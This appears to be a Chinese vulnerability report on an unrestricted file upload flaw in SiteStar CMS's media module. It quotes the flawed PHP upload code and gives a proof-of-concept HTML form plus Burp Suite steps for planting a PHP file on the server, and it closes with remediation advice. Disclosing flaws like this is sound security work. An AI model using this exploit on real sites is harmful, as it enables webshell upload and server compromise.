#1 漏洞产生
/module/mod_media.php
flash_picker() 和 image_picker() 两个函数
image_picker() 函数
$typeArr = array('image/jpeg','image/pjpeg');
$flash_typeArr = array('image/jpeg','image/pjpeg');
$file_info =& ParamHolder::get('localfile', array(), PS_FILES);
$file_info['name'] = Toolkit::changeFileNameChineseToPinyin($file_info['name']);
if ( sizeof($file_info) > 0 && isset($file_info['name']) )
{
// 文件大小
if ( ($file_info['size'] == 0) || ($file_info['size'] > $maxsize) ) {
$err = __('Upload size limit').':2M';
// 文件类型
} elseif ( !in_array( $file_info['type'], $typeArr ) ) {
$err = __('Supported file format').':jpg';
}else {
$dest = ROOT.'/upload/image/';
//$file_info['name'] = Toolkit::randomStr(8).strrchr($file_info["name"],".");
if (preg_match("/^WIN/i", PHP_OS) && preg_match("/[\x80-\xff]./", $file_info['name'])) {
$file_info['name'] = iconv("UTF-8", "GBK//IGNORE", $file_info['name']);
}
if ( move_uploaded_file( $file_info['tmp_name'], $dest.$file_info['name'] ) ) {
ParamParser::fire_virus($dest.$file_info['name']);
$wincls = 'OK';
// 图片水印
if( WATERMARK_STATUS ) $this->img_restruck($file_info['name']);
$this->assign('fname', $file_info['name']);
} else { $err = __('Uploading file failed!'); }
}
}
flash_picker()函数
$typeArr = array('application/x-shockwave-flash','application/x-download');
$file_info =& ParamHolder::get('localfile', array(), PS_FILES);
if ( sizeof($file_info) > 0 && isset($file_info['name']) )
{
// 文件大小
if ( ($file_info['size'] == 0) || ($file_info['size'] > $maxsize) ) {
$err = '上传大小限制:2M';
// 文件类型
} elseif ( !in_array( $file_info['type'], $typeArr ) ) {
//$err = '支持的文件类型:swf|flv';
$err = '支持的文件类型:swf';
} else {
$dest = ROOT.'/upload/flash/';
$file_info['name'] = Toolkit::randomStr(8).strrchr($file_info["name"],".");
if ( move_uploaded_file( $file_info['tmp_name'], $dest.$file_info['name'] ) ) {
ParamParser::fire_virus($dest.$file_info['name']);
$wincls = 'OK';
$this->assign('fname', $file_info['name']);
} else { $err = '上传失败'; }
}
}
看见了吧 两个函数都只检查了Content-Type参数
你们难道不知道Content-Type参数可以被完全控制吗?
鉴于这两个文件上传比较简单 就不多说了...
#2 漏洞利用
将如下代码保存为upload.htm
<form enctype="multipart/form-data" method="post" action="http://www.vulns.org/sitestar/index.php?_m=mod_media&_a=flash_picker">
Flash:<input type="file" name="localfile"/>
<input id="Upload" type="submit" value="Upload">
</form>
访问upload.php并上传文件,上传的时候用Burpsuite 抓包 并修改
点击Forward即可在 /upload/flash 下面生成php文件
修复方案:
强烈建议采用统一的上传代码;
对文件进行安全检查时,千万别只检查文件上传的Content-Type参数,这个参数只要抓包就可以对其进行任意修改。